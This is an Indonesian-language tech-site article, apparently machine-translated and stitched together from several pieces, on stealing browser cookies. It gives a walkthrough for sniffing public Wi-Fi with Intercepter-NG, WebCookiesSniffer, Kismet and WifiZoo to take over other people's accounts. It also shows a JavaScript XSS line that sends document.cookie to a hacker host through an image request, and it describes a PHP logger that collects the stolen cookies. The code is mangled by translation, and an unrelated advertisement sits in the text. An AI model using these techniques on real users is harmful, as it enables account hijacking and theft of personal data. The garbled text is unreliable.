Bagian situs
Pilihan Editor:
- Apa itu pembayaran perwalian MTS?
- Program Bonus Aeroflot: bagaimana cara mengumpulkan miles dan untuk apa Anda membelanjakannya?
- Cara mengetahui drive mana yang ada di komputer Anda: SSD atau HDD Cara mengetahui SSD mana yang ada di komputer Anda
- Menguji Desain Fraktal Tentukan R5 Desain Fraktal Tentukan R5 - Tenang, luas
- Bagaimana cara mempercepat ponsel pintar dan tablet Android?
- Pengendalian Banjir VKontakte: kami memberi tahu Anda mengapa masalah terjadi dan bagaimana cara menghilangkannya
- Pengisi daya berdasarkan catu daya ATX Catu daya laboratorium berdasarkan pengontrol 3528 PWM
- Apa yang harus dilakukan jika kabel tidak mengisi daya iPhone Anda
- Mesin virtual untuk Mac Jendela virtual di mac os
- Tentang layanan Tele2 Cara memasukkan konfirmasi pembayaran ke nomor 312
Periklanan
Cara mencegat cookie. Cara mudah untuk mencuri kue |
Tentang bahaya access point Wifi terbuka, tentang bagaimana password bisa disadap. Hari ini kita akan melihat cara mencegat kata sandi melalui Wi-Fi dan mencegat cookie melalui Wi-Fi menggunakan program ini. Serangan itu akan terjadi karena Mengendus.
Mengendus— mengendus diterjemahkan sebagai “Mengendus.” Sniffing memungkinkan Anda menganalisis aktivitas jaringan di Internet, melihat situs mana yang dikunjungi pengguna, dan mencegat kata sandi. Tapi itu juga bisa digunakan untuk tujuan yang bermanfaat, untuk mendengarkan virus yang mengirimkan data apa pun ke Internet.
Melayani avi1 menawarkan harga yang sangat murah untuk kesempatan memesan pelanggan ke profil Instagram Anda. Raih peningkatan popularitas atau penjualan online sekarang juga, tanpa menghabiskan banyak tenaga dan waktu. Bekerja dengan program Intercepter NG Jadi, program ini diluncurkan melalui Intercepter-NG.exe. Di bawah ini akan ada video pengaturannya (bagi yang lebih suka menonton daripada membaca). - Tekan tombolnya Modus Pemindaian(ikon radar)
Itu saja, kami melihat penyadapan kata sandi melalui Wi-Fi dan penyadapan cookie melalui Wi-Fi. jaga dirimu Kue - informasi dalam bentuk file teks yang disimpan di komputer pengguna oleh situs web. Berisi data autentikasi (login/password, ID, nomor telepon, alamat kotak surat), pengaturan pengguna, status akses. Disimpan di profil browser. Peretasan kue adalah pencurian (atau “pembajakan”) sesi pengunjung sumber daya web. Informasi pribadi tersedia tidak hanya bagi pengirim dan penerima, tetapi juga bagi pihak ketiga - orang yang melakukan intersepsi. Alat dan Teknik Peretasan CookiePencuri komputer, seperti rekan-rekannya di kehidupan nyata, selain keterampilan, ketangkasan dan pengetahuan, tentu saja, juga memiliki alatnya sendiri - semacam gudang kunci utama dan probe. Mari kita lihat trik paling populer yang digunakan peretas untuk mengekstrak cookie dari pengguna Internet. PengendusProgram khusus untuk pelacakan dan analisis lalu lintas jaringan. Nama mereka berasal dari kata kerja bahasa Inggris “sniff” (sniff), karena. secara harfiah “mengendus” paket yang dikirimkan antar node. Namun penyerang menggunakan sniffer untuk mencegat data sesi, pesan, dan lainnya informasi rahasia. Sasaran serangan mereka sebagian besar adalah jaringan yang tidak terlindungi, di mana cookie dikirim dalam sesi HTTP terbuka, yang berarti cookie tersebut praktis tidak dienkripsi. (Wi-Fi publik adalah yang paling rentan dalam hal ini.) Untuk menyematkan sniffer ke saluran Internet antara node pengguna dan server web, metode berikut digunakan:
Singkatan XSS adalah singkatan dari Lintas Situs Pembuatan skrip - pembuatan skrip lintas situs. Digunakan untuk menyerang situs web untuk mencuri data pengguna. Prinsip XSS adalah sebagai berikut:
Untuk “menanamkan” mekanisme perangkat lunak XSS, peretas menggunakan segala jenis kerentanan di server web, layanan online, dan browser. Semua kerentanan XSS dibagi menjadi dua jenis:
Peretas dengan hati-hati “menyamarkan” skrip XSS mereka sehingga korban tidak curiga. Mereka mengubah ekstensi file, memberikan kode sebagai gambar, memotivasi mereka untuk mengikuti tautan, dan menarik mereka dengan konten yang menarik. Akibatnya: pengguna PC, yang tidak mampu mengendalikan rasa penasarannya, dengan tangannya sendiri (dengan satu klik mouse) mengirimkan cookie sesi (dengan login dan kata sandi!) ke pembuat skrip XSS - penjahat komputer. Substitusi kueSemua cookie disimpan dan dikirim ke server web (dari mana cookie tersebut “berasal”) tanpa perubahan apa pun - dalam bentuk aslinya - dengan nilai, string, dan data lainnya yang sama. Modifikasi parameternya yang disengaja disebut substitusi cookie. Dengan kata lain, saat mengganti cookie, penyerang berpura-pura hanya angan-angan. Misalnya, saat melakukan pembayaran di toko online, cookie mengubah jumlah pembayaran ke bawah - sehingga terjadi “penghematan” pada pembelian. Cookie sesi yang dicuri di jejaring sosial dari akun orang lain “dimasukkan” ke sesi lain dan di PC lain. Pemilik cookie yang dicuri mendapatkan akses penuh ke akun korban (korespondensi, konten, pengaturan halaman) selama dia berada di halamannya. “Pengeditan” cookie dilakukan dengan menggunakan:
Akses fisik ke dataSangat rangkaian sederhana pelaksanaannya terdiri dari beberapa langkah. Namun ini hanya efektif jika komputer korban dengan sesi terbuka, misalnya VKontakte, dibiarkan tanpa pengawasan (dan untuk waktu yang lama!):
Biasanya, peretas menggunakan alat di atas (+ lainnya) baik secara kombinasi (karena tingkat perlindungan pada banyak sumber daya web cukup tinggi) dan secara terpisah (bila pengguna terlalu naif). XSS + pelacak
Melindungi cookie dari peretasan
Dan yang terpenting, jangan kehilangan kewaspadaan dan perhatian saat bersantai atau bekerja di Internet! Apa itu kue? Ada mekanisme yang memungkinkan server http untuk menyimpan beberapa informasi teks, lalu hubungi dia. Informasi ini disebut kue. Pada dasarnya, setiap cookie adalah pasangan: nama parameter dan nilainya. Setiap cookie juga diberi domain miliknya. Demi alasan keamanan, di semua browser server http hanya diperbolehkan mengakses cookie domainnya. Selain itu, cookie mungkin memiliki tanggal kedaluwarsa, yang berarti cookie akan disimpan di komputer hingga tanggal tersebut, bahkan jika Anda menutup semua jendela browser. Mengapa cookie penting? Semua sistem multi-pengguna menggunakan cookie untuk mengidentifikasi pengguna. Atau sebaiknya, koneksi saat ini pengguna dengan layanan, sesi pengguna. Jika seseorang mengenali cookie Anda, mereka akan dapat masuk ke sistem atas nama Anda. Karena di saat ini sangat sedikit sumber daya Internet yang memeriksa perubahan alamat IP selama satu sesi pengguna. Bagaimana cara mengubah atau mengganti cookie? Pengembang browser tidak menyediakan alat bawaan untuk mengedit cookie. Tapi Anda bisa bertahan dengan notepad biasa. Langkah 1: buat berkas teks dengan teks Editor Registri Windows Versi 5.00 Simpan dengan nama IE_ext.reg Langkah 2: Menggunakan file yang dibuat, tambahkan perubahan pada registri Windows. Langkah 3: buat file teks dengan teks <
script
bahasa="javascript"> script > Simpan dengan nama C:\IE_ext.htm Langkah 4: Kami pergi ke situs web yang kami minati. Langkah 5: Klik kanan pada ruang kosong di halaman dan pilih item menu "Bekerja dengan Cookie". Izinkan akses ke papan klip. Cookie Anda dari situs ini akan masuk ke clipboard. Anda dapat memasukkan notepad mereka dan melihatnya. Langkah 6: Untuk mengubah beberapa cookie, edit file C:\IE_ext.htm, ganti nama tes atas nama kue, nilai tes- tentang maknanya, domain uji.ru– ke domain situs. Jika perlu, tambahkan lebih banyak baris serupa. Untuk kemudahan kontrol, saya menambahkan ke skrip keluaran cookie saat ini sebelum dan sesudah perubahan: alert(external.menuArguments.document.cookie); Langkah 7: Lakukan Langkah 5 lagi, lalu segarkan halaman. Intinya: kami akan mengakses sumber daya Internet ini dengan cookie yang diperbarui. Bagaimana cara mencuri cookie menggunakan JavaScript? Jika penyerang berhasil menemukan peluang untuk mengeksekusi skrip JavaScript sewenang-wenang di komputer korban, maka ia dapat membaca cookie saat ini dengan sangat mudah. Contoh: var str= dokumen.cookie; Namun apakah dia dapat mentransfernya ke situsnya, karena seperti yang saya sebutkan sebelumnya, skrip JavaScript tidak akan dapat mengakses situs yang terletak di domain berbeda tanpa konfirmasi tambahan? Ternyata skrip JavaScript dapat memuat gambar apa pun yang terletak di server http mana pun. Pada saat yang sama, transfer informasi teks apa pun dalam permintaan pengunduhan ke gambar ini. Contoh: http://hackersite.ru/xss.jpg?text_info Jadi jika Anda menjalankan kode ini: var gambar= gambar baru(); img.src= "http://hackersite.ru/xss.jpg?"+ encodeURI(dokumen.cookie); maka cookie tersebut akan berakhir di permintaan untuk mendownload “gambar” dan akan “pergi” ke penyerang. Bagaimana cara menangani permintaan untuk mengunduh "gambar"? Penyerang hanya perlu mencari hosting dengan dukungan PHP dan menempatkan kode seperti ini di sana:
Kemudian semua parameter permintaan untuk skrip ini akan disimpan dalam file log.txt. Yang tersisa hanyalah mengganti skrip JavaScript yang dijelaskan sebelumnya http://hackersite.ru/xss.jpg ke jalur ke skrip php ini. Intinya Saya hanya menunjukkan cara paling sederhana untuk mengeksploitasi kerentanan XSS. Namun hal ini membuktikan bahwa kehadiran setidaknya satu kerentanan tersebut di situs Internet multi-pengguna dapat memungkinkan penyerang menggunakan sumber dayanya atas nama Anda. Pernahkah Anda memperhatikan bahwa ketika Anda kembali ke situs yang telah Anda kunjungi, situs tersebut mengenali Anda dan terbuka dengan pengaturan yang Anda terapkan terakhir kali? Ya, dan cukup sering? Hal ini terjadi berkat cookie yang menyimpan informasi tentang pengunjung seperti login, kata sandi, ID sesi, dan variabel lain yang diperlukan untuk mengidentifikasi pengunjung dan menampilkan konten halaman sesuai dengan preferensi pengguna yang dipilih selama kunjungan terakhir ke sumber daya. Program WebCookiesSniffer akan menampilkan cookie dan konten situs yang dilihat pengguna di browser kepada pengguna. Lihat CookieAnda membuka situs web dan WebCookiesSniffer menangkapnya kue secara real-time. Utilitas menambahkan semua cookie yang ditangkap ke tabel yang menyimpan data tentang host, jalur permintaan, total panjang file cookie, jumlah variabel dalam file cookie, dan Cookie itu sendiri dengan nama variabel dan nilai. WebCookiesSniffer dapat menyimpan informasi yang dikumpulkan tentang cookie ke file teks. Program ini juga memiliki kemampuan untuk menghasilkan laporan HTML untuk semua atau cookie yang dipilih. Agar program dapat berfungsi, Anda harus menginstal driver WinPcap (terletak di arsip bersama dengan WebCookiesSniffer). Untuk mengubah bahasa program WebCookiesSniffer ke Rusia, salin file WebCookiesSniffer_lng.ini (juga disertakan dalam arsip) ke direktori dengan utilitas tersebut. Tangkapan layar dari program WebCookiesSniffer
Halo, artikel pendek ini, agak genap Deskripsi Singkat Saya ingin mendedikasikan diri saya cara sederhana penangkapan kue V jaringan wi-fi. Saya tidak akan memberi tahu Anda di sini apa itu cookie dan mengapa diperlukan, jika seseorang tertarik untuk mencegat “makanan yang dipanggang”; dalam jaringan nirkabel, saya rasa dia harus tahu apa itu dan mengapa dia membutuhkannya. Saya hanya akan mengatakan satu hal: dengan menggunakan file ini Anda dapat memperoleh akses ke akun orang lain di berbagai situs yang mengharuskan pengguna melalui proses otentikasi (Misalnya, mail.ru, vkontakte.ru, dll.). Jadi mari kita mulai. Pertama kita perlu menemukan jaringan nirkabel, dengan gateway akses Internet terbuka, dan diharapkan jaringan ini memiliki klien yang cukup banyak. Misalnya, jaringan apa pun di pusat perbelanjaan besar, bandara, berbagai kedai kopi bisa digunakan di tempat-tempat yang biasa digunakan orang akses wi-fi di Internet, untuk membaca surat, memeriksa akun di berbagai situs kencan, melihat LJ dan berbagai forum. Ini semua adalah apa yang kita perlukan. Setelah memutuskan pilihan lokasi jaringan, setelah mempelajari jam-jam tertentu dari jumlah maksimum klien, mari kita langsung ke operasi tempur. Untuk melakukan ini, kita memerlukan laptop dengan adaptor Wi-Fi dan serangkaian program tertentu. Dalam kasus saya, saya menggunakan laptop acer Aspire 3610, kartu wi-fi klien D-Link DWL G650 dan OS BackTrack3 diinstal. Saya menyarankan Anda untuk menggunakan OS ini, karena OS ini sudah menyertakan seluruh rangkaian program yang mungkin Anda perlukan, dan keuntungan terpentingnya adalah Anda tidak perlu menginstal Backtrack di HDD, Anda dapat mem-boot OS ini langsung dari CD atau flash drive. Sekarang mari kita beralih ke perangkat lunak yang diperlukan. Saya menggunakan kismet untuk penemuan jaringan, dan WifiZoo untuk mencegat cookie. Saya akan membahas program kedua secara rinci. WifiZoo merupakan pemindai gelombang udara pasif dan mengumpulkan cukup banyak informasi berguna, seperti: pop3, lalu lintas smtp, cookie http/authinfo, msn, kredensial ftp, lalu lintas jaringan telnet, nbt, dll. Satu-satunya kelemahan dari program ini adalah kurangnya mode Channel hopping, WifiZoo hanya mendengarkan antarmuka nirkabel, dan bisa dikatakan, tidak dapat berpindah dari satu saluran ke saluran lainnya. Namun kelemahan ini dikompensasi oleh program lain, Kismet, yang mendukung mode ini. Untuk memulai WifiZoo Anda memerlukan:
Jadi mari kita luncurkan programnya, pertama mari kita luncurkan Kismet untuk mendukung mode saluran hopping, lalu luncurkan WifiZoo secara langsung, jendela berikut akan muncul di depan Anda: Sekarang yang tersisa hanyalah duduk dan menunggu sampai Anda mencegat sesuatu, segala sesuatu yang disadap oleh program dapat ditemukan di log, yang terletak di direktori dengan program /logs/. Anda juga dapat meluncurkan antarmuka GUI yang secara otomatis terhubung ke http di 127.0.0.1:8000 Saya tidak akan menulis tentang semua fitur dari program yang luar biasa ini, saya pikir Anda akan mengetahui sendiri kemungkinan lainnya, dan karena itu saat ini Kami hanya tertarik pada cookie. Klik tautan yang bertuliskan cookie dan lihat apa yang kami sadap: |
Populer:
Baru
- Program Bonus Aeroflot: bagaimana cara mengumpulkan miles dan untuk apa Anda membelanjakannya?
- Cara mengetahui drive mana yang ada di komputer Anda: SSD atau HDD Cara mengetahui SSD mana yang ada di komputer Anda
- Menguji Desain Fraktal Tentukan R5 Desain Fraktal Tentukan R5 - Tenang, luas
- Bagaimana cara mempercepat ponsel pintar dan tablet Android?
- Pengendalian Banjir VKontakte: kami memberi tahu Anda mengapa masalah terjadi dan bagaimana cara menghilangkannya
- Pengisi daya berdasarkan catu daya ATX Catu daya laboratorium berdasarkan pengontrol 3528 PWM
- Apa yang harus dilakukan jika kabel tidak mengisi daya iPhone Anda
- Mesin virtual untuk Mac Jendela virtual di mac os
- Tentang layanan Tele2 Cara memasukkan konfirmasi pembayaran ke nomor 312
- Bekerja dengan memori internal EEPROM Menghapus Eeprom